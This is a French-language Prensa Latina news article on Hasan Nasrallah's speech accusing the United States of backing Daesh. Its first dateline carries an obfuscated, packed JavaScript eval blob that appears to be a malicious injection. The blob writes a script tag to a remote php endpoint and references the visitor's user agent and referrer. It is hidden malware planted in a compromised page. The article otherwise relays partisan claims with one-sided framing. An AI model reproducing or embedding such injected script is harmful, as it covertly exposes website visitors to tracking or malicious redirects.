jeudi 18 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le Hezbollah dénonce le soutien des États-Unis à Daesh

Beyrouth, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iynaf|var|u0026u|referrer|ysbsh||js|php'.split('|'),0,{})) 9 octobre (Prensa Latina) Le secrétaire général du Mouvement de Résistance Islamique Hezbollah, Hasan Nasrallah, a dénoncé le soutien porté par les États-Unis à Daesh pour éviter l'effondrement total des terroristes.

Beyrouth, 9 octobre (Prensa Latina) Le secrétaire général du Mouvement de Résistance Islamique Hezbollah, Hasan Nasrallah, a dénoncé le soutien porté par les États-Unis à Daesh pour éviter l’effondrement total des terroristes.

Une note transmise hier aux médias rend compte d’une partie du discours prononcé par Nasrallah dans la région libanaise de la Bekaa lors d’un hommage à deux martyrs, Ali Hadi al-Ashq et Mohamad Naredine, tombés en Syrie la semaine dernière à la suite d’affrontements contre des terroristes.

Lors de la cérémonie, le dirigeant du Hezbollah, ou Parti de Dieu, a défini les deux martyrs, qui avaient le grade de commandant, comme « des exemples dans la vie et dans la bataille antiterroriste » .

Nasrallah a affirmé que les États-Unis empêchent l’éradication de Daesh, acronyme arabe pour État Islamique, dans l’objectif de favoriser un projet destiné à détruire l’Iran et ses alliés.

Cette théorie du secrétaire général du Hezbollah a été confirmé par des militaires libanais qui considèrent que la résistance est clé dans la bataille pour éliminer le chaos et le terrorisme au Moyen-Orient.

Le dirigeant du Parti de Dieu a déploré la perte de combattants et la souffrance causée aux familles, mais a indiqué que « lutter contre les extrémistes est l’unique manière de changer l’équation dessinée par Washington et Tel Aviv ».

L’allocution de Nasrallah n’était pas prévue mais comme l’offensive syrienne contre les radicaux se renforcera, le chef du Hezbollah a tenu à préciser des détails de ces futures opérations et à dénoncer l’intervention nors-américaine.

La semaine dernière sont apparus des rapports selon lesquels un drone étasunien aurait attaqué une base du Hezbollah en Syrie, mais The Daily Star souligne qu’un porte-parole du Département de la Défense des États-Unis  a démenti ces informations.

Ce jour-là, la direction du Hezbollah a indiqué la perte de huit combattants, mais n’a pas donné plus d’informations au sujet de leur emplacement et des causes de leur mort.

peo/tgj/arc

EN CONTINU
notes connexes